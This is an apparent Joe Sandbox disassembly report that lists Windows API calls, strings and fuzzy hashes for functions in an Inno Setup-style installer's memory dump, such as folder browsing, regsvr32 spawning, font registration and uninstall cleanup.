                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary$MessageNotifySend
                                                                                                      • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                      • API String ID: 3817813901-1884538726
                                                                                                      • Opcode ID: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                                      • Instruction ID: fb8259b883485ef9100c7f5c1e95e74d54582b152ce66d5af1bc00326fba4159
                                                                                                      • Opcode Fuzzy Hash: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                                      • Instruction Fuzzy Hash: 4451A034704240AFD711EB69D895B2E7BE9FB59704F50887BE801C72B1DB38A846CB5D
                                                                                                      Function 004619F8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                                                                      • GetActiveWindow.USER32 ref: 00461A97
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                                                                      • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                                                                      • CoUninitialize.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                                                                      • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                                                                      • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                                      • String ID: A
                                                                                                      • API String ID: 2684663990-3554254475
                                                                                                      • Opcode ID: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                                                      • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                                                                      • Opcode Fuzzy Hash: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                                                      • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                                                                      Function 00472C68 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                                                                        • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                                                        • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                      • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                      • API String ID: 884541143-1710247218
                                                                                                      • Opcode ID: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                                                      • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                                                                      • Opcode Fuzzy Hash: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                                                      • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                                                                      Function 0045D618 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(02380000,inflateInit_), ref: 0045D621
                                                                                                      • GetProcAddress.KERNEL32(02380000,inflate), ref: 0045D631
                                                                                                      • GetProcAddress.KERNEL32(02380000,inflateEnd), ref: 0045D641
                                                                                                      • GetProcAddress.KERNEL32(02380000,inflateReset), ref: 0045D651
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                      • API String ID: 190572456-3516654456
                                                                                                      • Opcode ID: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                                                      • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                                                                      • Opcode Fuzzy Hash: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                                                      • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                                                                      Function 0041A8EC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                                      • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                                      • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                                      • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                                      • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$StretchText
                                                                                                      • String ID:
                                                                                                      • API String ID: 2984075790-0
                                                                                                      • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                                      • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                                                                      • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                                      • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                                                                      Function 00457F00 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDirectoryHandleSystem
                                                                                                      • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                      • API String ID: 2051275411-1862435767
                                                                                                      • Opcode ID: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                                                      • Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
                                                                                                      • Opcode Fuzzy Hash: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                                                      • Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
                                                                                                      Function 0044D188 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
                                                                                                      • GetSysColor.USER32(00000014), ref: 0044D1C0
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
                                                                                                      • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
                                                                                                      • GetSysColor.USER32(00000010), ref: 0044D212
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$Color$Draw$OffsetRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 1005981011-0
                                                                                                      • Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                                      • Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
                                                                                                      • Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                                      • Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
                                                                                                      Function 0041B67C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041B755
                                                                                                      • 73A0A570.USER32(?), ref: 0041B761
                                                                                                      • 73A08830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                                      • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A08830$A022A16310A570Focus
                                                                                                      • String ID: k H
                                                                                                      • API String ID: 3731147114-1447039187
                                                                                                      • Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                                      • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                                      • Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                                      • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                                      Function 0041B94C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041BA27
                                                                                                      • 73A0A570.USER32(?), ref: 0041BA33
                                                                                                      • 73A08830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                                      • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A08830$A022A16310A570Focus
                                                                                                      • String ID: k H
                                                                                                      • API String ID: 3731147114-1447039187
                                                                                                      • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                                      • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                                      • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                                      • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                                      Function 00495EC4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                        • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                                                                      • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                                                                      • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                                                                      Strings
                                                                                                      • Deleting Uninstall data files., xrefs: 00495ECB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                      • String ID: Deleting Uninstall data files.
                                                                                                      • API String ID: 1570157960-2568741658
                                                                                                      • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                                      • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                                                                      • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                                      • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                                                                      Function 004704A4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                                                                      • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                                                                      Strings
                                                                                                      • Failed to set value in Fonts registry key., xrefs: 00470514
                                                                                                      • Failed to open Fonts registry key., xrefs: 00470529
                                                                                                      • AddFontResource, xrefs: 0047055D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                      • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                      • API String ID: 955540645-649663873
                                                                                                      • Opcode ID: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                                                      • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                                                                      • Opcode Fuzzy Hash: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                                                      • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                                                                      Function 0046319C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                        • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                        • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                                      • GetVersion.KERNEL32 ref: 004631CC
                                                                                                      • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                                                                      • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                                                                      • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                      • String ID: Explorer
                                                                                                      • API String ID: 2594429197-512347832
                                                                                                      • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                                      • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                                                                      • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                                      • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                                                                      Function 0047828C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                                      • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC), ref: 004782E8
